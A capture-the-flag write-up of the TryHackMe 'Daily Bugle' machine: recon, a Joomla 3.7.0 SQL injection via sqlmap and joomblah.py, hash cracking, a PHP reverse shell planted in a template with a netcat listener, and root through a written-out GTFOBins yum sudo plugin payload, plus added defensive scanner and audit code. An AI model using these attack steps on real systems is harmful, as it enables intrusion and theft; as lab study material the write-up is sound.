
Daily Bugle THM{}

Nmap

sudo nmap -A -sC -T4 10.10.208.57

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3306/tcp open mysql MariaDB (unauthorized)

Gobuster

gobuster dir -u http://10.10.208.57/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

/images               (Status: 301) [Size: 235] [--> http://10.10.208.57/images/]
/templates (Status: 301) [Size: 238] [--> http://10.10.208.57/templates/]
/media (Status: 301) [Size: 234] [--> http://10.10.208.57/media/]
/modules (Status: 301) [Size: 236] [--> http://10.10.208.57/modules/]
/bin (Status: 301) [Size: 232] [--> http://10.10.208.57/bin/]
/plugins (Status: 301) [Size: 236] [--> http://10.10.208.57/plugins/]
/includes (Status: 301) [Size: 237] [--> http://10.10.208.57/includes/]
/language (Status: 301) [Size: 237] [--> http://10.10.208.57/language/]
/components (Status: 301) [Size: 239] [--> http://10.10.208.57/components/]
/cache (Status: 301) [Size: 234] [--> http://10.10.208.57/cache/]
/libraries (Status: 301) [Size: 238] [--> http://10.10.208.57/libraries/]
/tmp (Status: 301) [Size: 232] [--> http://10.10.208.57/tmp/]
/layouts (Status: 301) [Size: 236] [--> http://10.10.208.57/layouts/]
/administrator (Status: 301) [Size: 242] [--> http://10.10.208.57/administrator/]
/cli (Status: 301) [Size: 232] [--> http://10.10.208.57/cli/]

Joomla

Searching HackTricks, we find how to get a list of files and the version of Joomla:

In /administrator/manifests/files/joomla.xml you can access a list of files inside the root folder, and the version of Joomla.
In /language/en-GB/en-GB.xml you can get the version of Joomla.
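As an added example (not from the writeup or from HackTricks), the following parser reads both manifest files named above, returns the version and file list, and flags the 3.7.0 release that the searchsploit hit on this page covers. The two XML snippets are constructed to mirror the layout of the real files.

```python
# Added example: parse Joomla's joomla.xml and en-GB.xml manifests for version and files.
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for /administrator/manifests/files/joomla.xml
JOOMLA_XML = """<extension version="3.6" type="file" method="upgrade">
  <name>files_joomla</name>
  <version>3.7.0</version>
  <fileset>
    <files>
      <folder>administrator</folder>
      <folder>components</folder>
      <file>index.php</file>
      <file>configuration.php</file>
    </files>
  </fileset>
</extension>"""

# Constructed stand-in for /language/en-GB/en-GB.xml
EN_GB_XML = """<metafile version="3.7" client="site">
  <name>English (en-GB)</name>
  <version>3.7.0</version>
</metafile>"""

# The release covered by the com_fields SQL injection entry (EDB 42033) on this page
COM_FIELDS_SQLI_VERSION = "3.7.0"


def joomla_version(xml_text):
    """Return the <version> text from either manifest form, or None if absent."""
    root = ET.fromstring(xml_text)
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


def manifest_files(xml_text):
    """Return the top-level entries declared in joomla.xml as (kind, name) tuples."""
    root = ET.fromstring(xml_text)
    return [(el.tag, el.text.strip()) for el in root.iterfind("fileset/files/*")]


def version_tuple(version):
    """Turn '3.7.0' into (3, 7, 0) so versions compare numerically."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def is_com_fields_sqli_version(version):
    """True when the install reports exactly the 3.7.0 release exploited in this writeup."""
    return version_tuple(version) == version_tuple(COM_FIELDS_SQLI_VERSION)
```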

Searchsploit and GitHub

With searchsploit, we can find an exploit for this version: searchsploit joomla 3.7.0

Joomla! 3.7.0 - 'com_fields' SQL Injection         php/webapps/42033.txt

searchsploit -p 42033

Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
URL: https://www.exploit-db.com/exploits/42033
Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text, with CRLF line terminators

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .

Now we open the exploit and find this sqlmap command: sqlmap -u "http://10.10.192.240/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test

[15:08:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[15:08:40] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.192.240'
[15:08:40] [WARNING] your sqlmap version is outdated
That is all we get, so we can't continue with sqlmap.
Let's look for something else on GitHub by searching `joomla 3.7.0`.
We find [joomblah.py](https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py), with an explanation of the vulnerability [HERE](https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html).

python3 joomblah.py http://10.10.192.240

[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
- Extracting sessions from fb9j5_session

John

Now we paste the hash into a file and use John to crack it: john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
1g 0:00:06:15 DONE (2022-03-22 15:31) 0.002660g/s 124.6p/s 124.6c/s 124.6C/s thelma1..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Webpage

We go to <IP>/administrator and log in with jonah / spiderman123. Once inside the administration panel, we see that a PHP file can be uploaded and then accessed.

After a little digging, we go to Templates and locate the index.php of beez3. Now we replace its PHP with pentestmonkey's php-reverse-shell (PHP REVERSE SHELL). After that, we start a netcat listener: nc -lvnp 5555

listening on [any] 5555 ...
connect to [10.11.62.63] from (UNKNOWN) [10.10.6.7] 60746
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:40:24 up 11 min, 0 users, load average: 0.00, 0.04, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$

And now we have a user shell.
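From the defender's side, the template edit above leaves a PHP file under the templates tree calling socket and process functions that no stock template needs. The following scanner, an added example that is not part of the writeup, walks a templates directory and reports such files; the directory, the clean template and the tampered beez3/index.php fragment are all constructed here so it runs offline.

```python
# Added example: flag template PHP files that use reverse-shell / web-shell primitives.
import os
import re
import tempfile

# PHP functions a connect-back or command shell relies on; a stock template
# such as beez3/index.php has no reason to call any of them.
SUSPICIOUS = ("fsockopen", "proc_open", "popen", "shell_exec", "exec", "system", "passthru")
PATTERN = re.compile(r"\b(" + "|".join(SUSPICIOUS) + r")\s*\(")


def scan_php_file(path):
    """Return the sorted set of suspicious function names called in one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return sorted(set(PATTERN.findall(fh.read())))


def scan_templates(root):
    """Walk a templates directory; map each flagged .php path (relative) to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_php_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_sample_tree():
    """Constructed templates tree: one clean template and one tampered beez3/index.php."""
    root = tempfile.mkdtemp(prefix="joomla_templates_")
    os.makedirs(os.path.join(root, "protostar"))
    os.makedirs(os.path.join(root, "beez3"))
    with open(os.path.join(root, "protostar", "index.php"), "w") as fh:
        fh.write("<?php defined('_JEXEC') or die; $app = JFactory::getApplication(); ?>")
    with open(os.path.join(root, "beez3", "index.php"), "w") as fh:
        # Constructed fragment shaped like a connect-back shell, not a working one
        fh.write("<?php $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
                 "$process = proc_open('/bin/sh -i', $descriptors, $pipes); ?>")
    return root


if __name__ == "__main__":
    for rel_path, hits in scan_templates(build_sample_tree()).items():
        print(f"{rel_path}: {', '.join(hits)}")
```

Pair this with a file-integrity baseline (hashes or mtimes of the templates tree), since a shell can also be dropped as a new file rather than by editing index.php.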

Reverse Shell

Let's improve our shell by following this guide (UPGRADE SHELL). Now we need to locate the flags. As we don't have permission to access the jjameson folder or the root folder, we have to escalate privileges. For that, let's use linpeas.sh

Searching passwords in config PHP files
public $password = 'nv5uz9r3ZEDzVjNu';
$this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
$this->password = null;
'password' => $this->password,

We also find this:

-rwxr-xr-x. 1 apache apache 8378 Apr 25  2017 /var/www/html/libraries/joomla/cache/storage.php
-rwxr-xr-x. 1 apache apache 4948 Apr 25 2017 /var/www/html/libraries/joomla/session/storage.php
-rwxr-xr-x. 1 apache apache 1060 Apr 25 2017 /var/www/html/administrator/components/com_installer/controllers/database.php
-rwxr-xr-x. 1 apache apache 7802 Apr 25 2017 /var/www/html/administrator/components/com_installer/models/database.php
-rwxr-xr-x. 1 apache apache 5876 Apr 25 2017 /var/www/html/libraries/fof/database/database.php
-rwxr-xr-x. 1 apache apache 5328 Apr 25 2017 /var/www/html/libraries/joomla/database/database.php
-rwxr-xr-x. 1 apache apache 3934 Apr 25 2017 /var/www/html/libraries/joomla/log/logger/database.php
-rwxr-xr-x. 1 apache apache 1455 Apr 25 2017 /var/www/html/libraries/joomla/model/database.php
-rwxr-xr-x. 1 apache apache 3978 Apr 25 2017 /var/www/html/libraries/joomla/session/storage/database.php

In the file configuration.php we find the password nv5uz9r3ZEDzVjNu, and it also works for the user jjameson. The user flag is located there.

Privilege escalation

We run linpeas.sh again as jjameson and find this:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d

User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum

So we go to https://gtfobins.github.io/#yum. There, we find this code to become root.

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
sh-4.2# whoami
root
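The rule `(ALL) NOPASSWD: /usr/bin/yum` is the whole problem: yum accepts `-c` and plugin paths, so any user allowed to run it as root can load their own code. The following audit helper, an added example that is neither from the writeup nor from GTFOBins, parses `sudo -l` output of the shape shown above and flags password-less rules on such binaries. The sample output is constructed, and the SHELL_CAPABLE set is an assumption seeded with the one binary this box uses.

```python
# Added example: audit `sudo -l` output for NOPASSWD rules on binaries that load code.
import re

# Constructed sample in the format sudo prints (the yum line matches this box)
SAMPLE_SUDO_L = """Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, env_reset

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
"""

# Binaries that honour a caller-supplied config or plugin directory and so can
# execute arbitrary code as root. Assumption: extend this from GTFOBins for your estate.
SHELL_CAPABLE = {"yum"}

# One rule line: "(runas) TAG: TAG: command, command"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (runas, tags, commands) tuples from the rules section of `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = RULE.match(line) if in_rules else None
        if match:
            tags = [t.rstrip(":") for t in match.group("tags").split()]
            cmds = [c.strip() for c in match.group("cmds").split(",")]
            rules.append((match.group("runas").strip(), tags, cmds))
    return rules


def risky_rules(text):
    """Flag NOPASSWD rules whose command is a binary able to spawn a root shell."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(text):
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if "NOPASSWD" in tags and binary in SHELL_CAPABLE:
                findings.append(f"{cmd} as ({runas}) without a password: "
                                f"{binary} can load a plugin and exec /bin/sh")
    return findings


if __name__ == "__main__":
    for finding in risky_rules(SAMPLE_SUDO_L):
        print("RISK:", finding)
```

Restricting the rule to specific yum subcommands does not help, since the `-c` config path is still accepted; the fix is to not delegate yum through sudo at all.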